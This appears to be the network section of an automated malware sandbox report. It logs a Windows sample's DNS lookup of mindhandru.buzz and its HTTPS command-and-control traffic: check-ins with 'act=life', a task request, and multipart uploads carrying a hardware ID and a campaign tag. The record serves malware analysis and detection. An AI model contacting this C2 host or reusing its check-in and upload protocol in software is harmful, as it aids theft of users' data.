Dec 26, 2024 12:46:46.708544970 CET	49893	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:46:46.708559036 CET	443	49893	104.21.11.101	192.168.2.7
Dec 26, 2024 12:46:46.708945036 CET	443	49893	104.21.11.101	192.168.2.7
Dec 26, 2024 12:46:46.712316990 CET	49893	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:46:46.712408066 CET	443	49893	104.21.11.101	192.168.2.7
Dec 26, 2024 12:46:46.712460995 CET	49893	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:46:46.763643026 CET	49899	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:46:46.763686895 CET	443	49899	104.21.11.101	192.168.2.7
Dec 26, 2024 12:46:46.763942003 CET	49899	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:46:46.764724016 CET	49899	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:46:46.764736891 CET	443	49899	104.21.11.101	192.168.2.7
Dec 26, 2024 12:46:48.068114996 CET	443	49899	104.21.11.101	192.168.2.7
Dec 26, 2024 12:46:48.068192959 CET	49899	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:46:48.069978952 CET	49899	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:46:48.069986105 CET	443	49899	104.21.11.101	192.168.2.7
Dec 26, 2024 12:46:48.070250034 CET	443	49899	104.21.11.101	192.168.2.7
Dec 26, 2024 12:46:48.071641922 CET	49899	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:46:48.071687937 CET	443	49899	104.21.11.101	192.168.2.7
Dec 26, 2024 12:46:48.071734905 CET	49899	443	192.168.2.7	104.21.11.101

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 26, 2024 12:45:14.313517094 CET	61212	53	192.168.2.7	1.1.1.1
Dec 26, 2024 12:45:14.450733900 CET	53	61212	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 26, 2024 12:45:14.313517094 CET	192.168.2.7	1.1.1.1	0xed90	Standard query (0)	mindhandru.buzz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 26, 2024 12:45:14.450733900 CET	1.1.1.1	192.168.2.7	0xed90	No error (0)	mindhandru.buzz		104.21.11.101	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:45:14.450733900 CET	1.1.1.1	192.168.2.7	0xed90	No error (0)	mindhandru.buzz		172.67.165.185	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

mindhandru.buzz

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49704	104.21.11.101	443	3804	C:\Users\user\Desktop\ZX2M0AXZ56.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 11:45:15 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: mindhandru.buzz
2024-12-26 11:45:15 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-26 11:45:16 UTC	1121	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 11:45:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ekapr5amonbrsurclkg81k93b8; expires=Mon, 21 Apr 2025 05:31:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WEBKQvGjWP8x5bvqk7C9yGuHktXepk%2FT8KX6D7eQtndp2I1SjBHWwnCQu%2BDEDyFzpybNpWr1wTkIHehGtOu7XKeub7lpB9TCmptNyGccaQJ9di7BHuxAQ6LyGILK4lUqYIk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f80d2dc0ef3de98-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1728&min_rtt=1707&rtt_var=655&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=906&delivery_rate=1710603&cwnd=212&unsent_bytes=0&cid=10c2dd30279b8dfb&ts=897&x=0"
2024-12-26 11:45:16 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-26 11:45:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49705	104.21.11.101	443	3804	C:\Users\user\Desktop\ZX2M0AXZ56.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 11:45:18 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 53 Host: mindhandru.buzz
2024-12-26 11:45:18 UTC	53	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-12-26 11:45:26 UTC	1126	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 11:45:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=oo0nbvfb7o7a5503vpa0unu41l; expires=Mon, 21 Apr 2025 05:32:04 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g3W6WEzG3BSp3b%2FmmiD%2BKACxshBJu1tOS63sHzHnLG49mj%2BvHPOe1rVVcEeBQ4xZieL3XBm0HJY9jFbN8JPe7p0sEIdKkThgkgJ1Gu63AivPJbg%2FtbKprhhhSjqUh6ejnKk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f80d2e9ce648c81-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1886&min_rtt=1834&rtt_var=725&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=952&delivery_rate=1592148&cwnd=235&unsent_bytes=0&cid=f30168ed68f61b59&ts=7964&x=0"
2024-12-26 11:45:26 UTC	243	IN	Data Raw: 34 39 31 63 0d 0a 41 5a 69 33 30 58 6f 6d 6f 7a 43 39 68 68 48 76 4d 67 32 64 6e 62 67 45 33 62 52 36 42 6b 6f 42 62 75 47 2f 65 31 37 46 45 73 6c 36 75 73 48 7a 51 42 4b 50 45 73 37 6a 4d 39 56 47 66 2b 6a 34 6c 43 61 38 30 46 67 38 4c 47 41 43 6b 74 70 58 66 4c 4e 2f 36 7a 76 2b 31 72 30 4a 51 34 38 53 32 50 34 7a 31 57 6c 32 76 2f 6a 57 4a 75 65 57 48 32 77 6f 59 41 4b 44 33 68 41 78 74 58 36 71 61 66 54 51 75 52 39 46 78 31 48 52 36 33 53 4b 56 32 7a 33 38 39 46 70 74 64 6c 59 4b 6d 68 6b 46 4d 4f 46 57 52 4f 67 5a 71 68 4d 2b 63 53 36 57 46 75 50 53 35 2f 6a 66 38 30 49 4c 2f 7a 34 32 6d 69 37 30 42 46 75 49 6d 6b 4b 67 74 73 52 4c 71 78 30 6f 57 6e 36 30 37 67 56 54 4e 4e 63 32 2b 78 2f 6a 46 31 73 76 37 47 61 59 Data Ascii: 491cAZi30XomozC9hhHvMg2dnbgE3bR6BkoBbuG/e17FEsl6usHzQBKPEs7jM9VGf+j4lCa80Fg8LGACktpXfLN/6zv+1r0JQ48S2P4z1Wl2v/jWJueWH2woYAKD3hAxtX6qafTQuR9Fx1HR63SKV2z389FptdlYKmhkFMOFWROgZqhM+cS6WFuPS5/jf80IL/z42mi70BFuImkKgtsRLqx0oWn607gVTNNc2+x/jF1sv7GaY
2024-12-26 11:45:26 UTC	1369	IN	Data Raw: 61 65 57 51 43 52 37 55 51 2b 53 7a 41 77 78 74 33 62 72 66 4c 54 4d 38 78 39 49 67 51 71 66 37 48 2b 44 56 57 7a 77 2b 4e 74 6d 72 64 6b 59 5a 79 42 72 43 49 6e 53 46 6a 4f 70 65 71 78 72 38 39 4b 38 48 30 7a 48 58 64 79 6b 50 63 31 58 64 37 2b 6e 6d 6b 61 76 31 52 74 77 4a 58 4a 4d 6e 4a 4d 41 66 4b 42 38 36 7a 75 36 30 37 30 5a 53 63 46 41 31 2b 39 34 69 45 4a 6b 39 76 4c 58 5a 72 4c 63 46 32 63 6f 5a 41 61 4a 30 68 4d 34 71 6e 32 74 59 2f 71 56 2f 56 68 44 32 52 4b 48 70 46 43 49 51 47 6a 7a 36 5a 68 63 2f 38 6c 57 66 57 68 6b 41 4d 4f 46 57 54 53 69 63 36 68 6f 39 64 61 37 45 31 62 42 51 4e 6e 70 64 70 39 57 61 76 48 31 32 58 53 31 32 42 35 6e 49 57 67 46 68 74 6f 64 66 4f 6b 77 72 48 75 36 6a 66 4d 35 53 63 70 65 31 66 4e 7a 7a 55 38 68 35 72 2f 64 Data Ascii: aeWQCR7UQ+SzAwxt3brfLTM8x9IgQqf7H+DVWzw+NtmrdkYZyBrCInSFjOpeqxr89K8H0zHXdykPc1Xd7+nmkav1RtwJXJMnJMAfKB86zu6070ZScFA1+94iEJk9vLXZrLcF2coZAaJ0hM4qn2tY/qV/VhD2RKHpFCIQGjz6Zhc/8lWfWhkAMOFWTSic6ho9da7E1bBQNnpdp9WavH12XS12B5nIWgFhtodfOkwrHu6jfM5Scpe1fNzzU8h5r/d
2024-12-26 11:45:26 UTC	1369	IN	Data Raw: 35 72 4a 57 39 4d 7a 5a 30 65 4a 4f 63 6f 36 30 6e 35 77 62 41 53 42 76 52 52 30 65 70 30 6d 78 42 77 73 65 61 61 59 62 4f 57 51 43 51 6c 59 67 53 46 7a 78 59 78 70 48 36 6c 62 50 2f 61 75 78 68 45 7a 46 66 62 37 33 69 4f 58 57 76 74 39 64 70 75 75 74 63 53 62 6d 67 74 54 49 54 46 57 57 54 6e 51 62 78 6f 75 4f 43 77 46 6b 72 47 52 4a 2f 37 50 5a 51 51 61 50 4f 2f 67 69 61 79 33 68 31 68 4a 32 49 47 6a 64 67 54 4d 4b 39 2b 71 48 48 31 30 62 4d 55 54 4d 74 66 30 65 42 37 68 46 74 6b 2b 66 2f 62 62 50 2b 59 57 47 4d 77 49 31 54 44 36 52 34 77 71 6e 2f 70 56 76 6e 62 76 52 39 53 67 55 32 52 2f 54 4f 4b 58 43 2b 6e 76 39 5a 76 76 39 30 53 59 43 68 6b 41 59 62 65 48 6a 2b 71 64 36 46 74 2f 64 47 2f 45 55 6e 48 55 74 6a 67 64 70 39 56 5a 76 50 7a 6d 69 6a 2f 30 Data Ascii: 5rJW9MzZ0eJOco60n5wbASBvRR0ep0mxBwseaaYbOWQCQlYgSFzxYxpH6lbP/auxhEzFfb73iOXWvt9dpuutcSbmgtTITFWWTnQbxouOCwFkrGRJ/7PZQQaPO/giay3h1hJ2IGjdgTMK9+qHH10bMUTMtf0eB7hFtk+f/bbP+YWGMwI1TD6R4wqn/pVvnbvR9SgU2R/TOKXC+nv9Zvv90SYChkAYbeHj+qd6Ft/dG/EUnHUtjgdp9VZvPzmij/0
2024-12-26 11:45:26 UTC	1369	IN	Data Raw: 36 54 49 54 52 57 57 54 6e 65 61 4a 78 39 4e 75 36 46 55 4c 4a 56 64 48 70 65 49 74 62 61 50 6a 35 31 32 36 79 30 78 74 6c 4c 47 6b 65 67 4e 59 54 4d 61 30 77 35 53 50 39 7a 66 4e 41 42 4f 5a 65 39 76 52 6f 6e 30 59 76 34 4c 48 44 4a 72 6a 61 57 44 78 6f 59 41 4f 4b 30 68 45 30 71 48 2b 76 62 66 7a 54 76 68 31 4c 79 30 44 58 36 6e 36 47 58 32 54 74 2f 39 64 69 73 39 49 51 62 79 49 6a 51 73 50 61 41 58 7a 2f 4d 4a 35 75 39 64 57 77 44 67 54 65 48 4d 61 6b 64 49 45 51 4e 37 2f 7a 31 47 61 77 32 68 52 76 49 47 49 41 6a 64 6f 63 4e 61 39 34 75 57 4c 2b 33 62 49 57 53 38 42 57 32 75 46 33 69 6c 52 70 38 4c 2b 55 4a 72 6a 4f 57 44 78 6f 54 43 75 32 6e 7a 67 47 35 32 2f 6c 65 72 72 53 76 31 67 63 67 56 37 63 36 48 75 43 56 6d 62 7a 39 64 4e 74 73 39 30 63 61 43 Data Ascii: 6TITRWWTneaJx9Nu6FULJVdHpeItbaPj5126y0xtlLGkegNYTMa0w5SP9zfNABOZe9vRon0Yv4LHDJrjaWDxoYAOK0hE0qH+vbfzTvh1Ly0DX6n6GX2Tt/9dis9IQbyIjQsPaAXz/MJ5u9dWwDgTeHMakdIEQN7/z1Gaw2hRvIGIAjdocNa94uWL+3bIWS8BW2uF3ilRp8L+UJrjOWDxoTCu2nzgG52/lerrSv1gcgV7c6HuCVmbz9dNts90caC
2024-12-26 11:45:26 UTC	1369	IN	Data Raw: 33 42 67 36 74 58 65 69 63 66 54 59 76 42 42 4d 79 46 50 62 34 58 36 4c 58 47 58 2b 2b 4e 52 6f 74 35 5a 57 4a 43 39 37 54 4e 75 64 4f 43 79 38 59 72 31 75 32 39 69 38 57 46 75 50 53 35 2f 6a 66 38 30 49 4c 2f 62 74 33 6d 75 74 33 78 39 71 4a 32 41 65 67 74 41 53 4c 71 42 2f 72 32 54 32 30 37 77 65 52 63 52 59 30 2b 4e 32 68 6c 39 6a 76 37 47 61 59 61 65 57 51 43 51 47 61 42 2b 55 33 68 63 33 73 57 76 72 66 4c 54 4d 38 78 39 49 67 51 71 66 35 33 69 47 56 47 2f 7a 2f 39 35 72 76 38 51 58 59 79 39 71 42 35 48 58 48 6a 75 73 65 4b 42 73 2f 4d 65 2f 46 6c 62 45 51 4d 32 6b 50 63 31 58 64 37 2b 6e 6d 6c 43 34 78 67 68 6e 61 6c 49 61 67 4d 73 53 4d 61 73 77 74 43 33 6a 6c 62 51 55 42 4a 6b 53 32 65 74 36 6a 6c 39 75 39 76 50 58 59 37 62 54 47 57 49 73 61 51 61 Data Ascii: 3Bg6tXeicfTYvBBMyFPb4X6LXGX++NRot5ZWJC97TNudOCy8Yr1u29i8WFuPS5/jf80IL/bt3mut3x9qJ2AegtASLqB/r2T207weRcRY0+N2hl9jv7GaYaeWQCQGaB+U3hc3sWvrfLTM8x9IgQqf53iGVG/z/95rv8QXYy9qB5HXHjuseKBs/Me/FlbEQM2kPc1Xd7+nmlC4xghnalIagMsSMaswtC3jlbQUBJkS2et6jl9u9vPXY7bTGWIsaQa
2024-12-26 11:45:26 UTC	1369	IN	Data Raw: 4c 67 2b 73 69 50 39 32 66 4e 41 42 4d 4a 56 33 4f 56 35 68 46 78 67 2b 50 76 49 62 4c 6a 45 47 57 55 6a 62 67 43 44 30 42 51 32 70 6e 6d 6d 62 2f 66 53 74 42 64 42 67 52 79 66 34 32 76 4e 43 43 2f 65 38 74 46 71 35 49 78 59 65 32 5a 36 54 49 54 52 57 57 54 6e 63 4b 46 6d 38 4e 69 77 46 30 66 54 55 39 6e 32 63 34 42 61 66 66 58 30 33 32 75 79 32 78 74 69 4c 6d 67 41 6b 64 51 5a 50 36 77 77 35 53 50 39 7a 66 4e 41 42 4f 4a 46 79 65 35 30 67 55 5a 6b 2f 76 7a 4d 61 36 2b 57 56 69 51 35 5a 42 33 44 68 51 38 73 73 48 65 30 4c 65 4f 56 74 42 51 45 6d 52 4c 5a 37 58 57 4b 56 6d 48 74 2b 74 78 70 73 4e 38 52 59 43 42 67 44 49 66 5a 48 6a 6d 6b 66 4b 42 6b 2b 64 71 33 45 55 72 49 58 5a 2b 71 4d 34 70 49 4c 36 65 2f 2b 33 32 38 32 68 55 6b 4e 79 30 56 77 39 6f 56 Data Ascii: Lg+siP92fNABMJV3OV5hFxg+PvIbLjEGWUjbgCD0BQ2pnmmb/fStBdBgRyf42vNCC/e8tFq5IxYe2Z6TITRWWTncKFm8NiwF0fTU9n2c4BaffX032uy2xtiLmgAkdQZP6ww5SP9zfNABOJFye50gUZk/vzMa6+WViQ5ZB3DhQ8ssHe0LeOVtBQEmRLZ7XWKVmHt+txpsN8RYCBgDIfZHjmkfKBk+dq3EUrIXZ+qM4pIL6e/+3282hUkNy0Vw9oV
2024-12-26 11:45:26 UTC	1369	IN	Data Raw: 73 37 75 76 57 34 44 6b 48 47 52 4a 33 52 63 49 4e 65 61 4f 6d 2f 78 56 6e 78 6c 68 64 2b 61 44 73 31 6d 70 30 65 4d 4f 63 6f 36 33 62 39 31 62 51 43 55 73 5a 65 7a 75 39 2b 67 58 4a 67 2b 4f 6e 5a 61 62 7a 48 45 53 67 6a 62 6b 7a 4e 6e 52 34 6b 35 79 6a 72 54 50 33 44 73 44 64 48 30 46 75 66 71 6a 4f 4b 52 69 2b 6e 76 2b 51 6d 72 64 55 49 5a 79 64 79 4d 73 4f 46 41 41 4c 6e 65 37 31 6b 36 74 61 6c 45 30 6e 4e 51 2b 47 6b 4b 39 6b 43 50 61 32 74 69 48 6e 2f 79 53 63 71 61 47 4a 4d 32 2b 51 41 66 4c 45 77 38 7a 47 30 6c 61 46 59 48 49 45 56 33 50 5a 68 69 31 4e 35 2f 4c 6a 6b 57 4a 6a 41 45 6d 4d 34 5a 42 75 4d 6e 56 64 38 71 44 44 7a 57 72 72 63 74 41 4e 56 31 31 2f 50 34 7a 4f 79 48 69 2f 6e 76 34 49 6d 69 74 55 57 61 69 39 31 48 63 37 36 44 7a 61 67 59 Data Ascii: s7uvW4DkHGRJ3RcINeaOm/xVnxlhd+aDs1mp0eMOco63b91bQCUsZezu9+gXJg+OnZabzHESgjbkzNnR4k5yjrTP3DsDdH0FufqjOKRi+nv+QmrdUIZydyMsOFAALne71k6talE0nNQ+GkK9kCPa2tiHn/yScqaGJM2+QAfLEw8zG0laFYHIEV3PZhi1N5/LjkWJjAEmM4ZBuMnVd8qDDzWrrctANV11/P4zOyHi/nv4ImitUWai91Hc76DzagY
2024-12-26 11:45:26 UTC	1369	IN	Data Raw: 59 76 46 52 4b 79 6c 4c 59 39 47 57 57 48 47 66 38 35 63 42 59 67 66 30 55 59 69 39 35 43 34 58 37 4f 58 7a 70 4d 4b 51 6a 6f 75 7a 7a 55 41 54 2b 48 4a 2f 38 4d 39 55 51 57 76 7a 78 31 47 47 70 78 31 56 4d 43 31 6b 32 77 66 45 65 4b 65 56 45 72 48 50 72 33 72 34 55 42 49 38 53 32 61 51 72 33 52 34 76 2b 2b 36 61 50 75 2b 45 51 7a 46 37 4e 46 7a 52 77 6c 63 6c 35 32 62 72 4f 36 69 62 38 77 6f 45 6d 52 4b 59 35 32 47 66 56 6d 7a 70 2f 4a 31 59 67 66 45 57 59 79 6c 31 48 4a 54 53 4a 77 4b 79 63 36 56 74 2f 63 4f 69 57 41 71 42 58 5a 2b 38 53 73 30 59 4c 38 43 78 6d 6e 37 2f 6a 6c 68 52 4b 32 30 43 68 4d 73 49 63 59 42 2b 72 47 4c 73 78 61 51 58 42 49 38 53 32 61 51 72 33 78 34 76 2b 2b 36 61 50 75 2b 45 51 7a 46 37 4e 46 7a 52 77 6c 63 6c 35 32 62 72 4f 36 Data Ascii: YvFRKylLY9GWWHGf85cBYgf0UYi95C4X7OXzpMKQjouzzUAT+HJ/8M9UQWvzx1GGpx1VMC1k2wfEeKeVErHPr3r4UBI8S2aQr3R4v++6aPu+EQzF7NFzRwlcl52brO6ib8woEmRKY52GfVmzp/J1YgfEWYyl1HJTSJwKyc6Vt/cOiWAqBXZ+8Ss0YL8Cxmn7/jlhRK20ChMsIcYB+rGLsxaQXBI8S2aQr3x4v++6aPu+EQzF7NFzRwlcl52brO6
2024-12-26 11:45:26 UTC	1369	IN	Data Raw: 51 34 4e 79 32 50 4a 77 7a 52 34 76 38 37 2b 43 4a 72 37 63 43 47 6b 6e 5a 45 43 45 78 78 35 38 36 54 43 6c 49 36 4b 56 73 68 4a 55 7a 46 33 59 71 48 57 44 58 69 2f 67 73 63 4d 6d 71 5a 5a 41 4e 32 59 6a 48 73 4f 46 57 58 75 6b 59 72 6c 6c 2b 63 4f 77 58 33 72 2f 66 38 33 6a 59 34 34 53 58 76 4c 37 7a 48 4f 38 78 68 39 61 46 6b 34 65 68 4d 30 61 66 70 5a 6d 71 47 50 30 30 76 4e 57 42 4e 6b 53 68 36 52 65 6e 31 64 2f 2f 4c 2b 55 4a 72 4f 57 51 43 51 6c 63 51 75 54 33 6c 55 37 76 58 66 72 66 4c 54 4d 38 77 34 45 6d 51 47 52 70 47 48 4e 43 43 2b 34 38 64 64 6e 76 4e 67 62 64 6a 70 6c 44 35 58 65 58 67 4b 5a 58 62 6c 6b 36 74 62 78 4b 55 6e 46 52 4d 72 6e 59 34 70 75 55 64 4c 74 33 58 61 38 6c 44 52 6a 4a 57 38 79 76 65 6f 49 4f 37 63 79 6a 57 44 73 31 76 4e Data Ascii: Q4Ny2PJwzR4v87+CJr7cCGknZECExx586TClI6KVshJUzF3YqHWDXi/gscMmqZZAN2YjHsOFWXukYrll+cOwX3r/f83jY44SXvL7zHO8xh9aFk4ehM0afpZmqGP00vNWBNkSh6Ren1d//L+UJrOWQCQlcQuT3lU7vXfrfLTM8w4EmQGRpGHNCC+48ddnvNgbdjplD5XeXgKZXblk6tbxKUnFRMrnY4puUdLt3Xa8lDRjJW8yveoIO7cyjWDs1vN

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49722	104.21.11.101	443	3804	C:\Users\user\Desktop\ZX2M0AXZ56.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 11:45:27 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=WSR4CMZL6AU User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12808 Host: mindhandru.buzz
2024-12-26 11:45:27 UTC	12808	OUT	Data Raw: 2d 2d 57 53 52 34 43 4d 5a 4c 36 41 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 32 45 34 39 43 44 31 37 31 36 41 33 42 37 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 57 53 52 34 43 4d 5a 4c 36 41 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 57 53 52 34 43 4d 5a 4c 36 41 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 57 53 52 34 43 4d 5a 4c 36 41 55 Data Ascii: --WSR4CMZL6AUContent-Disposition: form-data; name="hwid"692E49CD1716A3B7BEBA0C6A975F1733--WSR4CMZL6AUContent-Disposition: form-data; name="pid"2--WSR4CMZL6AUContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--WSR4CMZL6AU

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49827	104.21.11.101	443	3804	C:\Users\user\Desktop\ZX2M0AXZ56.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 11:46:15 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=HWMX4PKTX58WQYOMZ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15076 Host: mindhandru.buzz
2024-12-26 11:46:15 UTC	15076	OUT	Data Raw: 2d 2d 48 57 4d 58 34 50 4b 54 58 35 38 57 51 59 4f 4d 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 32 45 34 39 43 44 31 37 31 36 41 33 42 37 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 48 57 4d 58 34 50 4b 54 58 35 38 57 51 59 4f 4d 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 48 57 4d 58 34 50 4b 54 58 35 38 57 51 59 4f 4d 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 Data Ascii: --HWMX4PKTX58WQYOMZContent-Disposition: form-data; name="hwid"692E49CD1716A3B7BEBA0C6A975F1733--HWMX4PKTX58WQYOMZContent-Disposition: form-data; name="pid"2--HWMX4PKTX58WQYOMZContent-Disposition: form-data; name="lid"LOGS11--LiveTraf

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49845	104.21.11.101	443	3804	C:\Users\user\Desktop\ZX2M0AXZ56.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 11:46:22 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=03PXA2FG4VMP User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20371 Host: mindhandru.buzz
2024-12-26 11:46:22 UTC	15331	OUT	Data Raw: 2d 2d 30 33 50 58 41 32 46 47 34 56 4d 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 32 45 34 39 43 44 31 37 31 36 41 33 42 37 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 30 33 50 58 41 32 46 47 34 56 4d 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 30 33 50 58 41 32 46 47 34 56 4d 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 30 33 50 58 41 32 46 47 Data Ascii: --03PXA2FG4VMPContent-Disposition: form-data; name="hwid"692E49CD1716A3B7BEBA0C6A975F1733--03PXA2FG4VMPContent-Disposition: form-data; name="pid"3--03PXA2FG4VMPContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--03PXA2FG
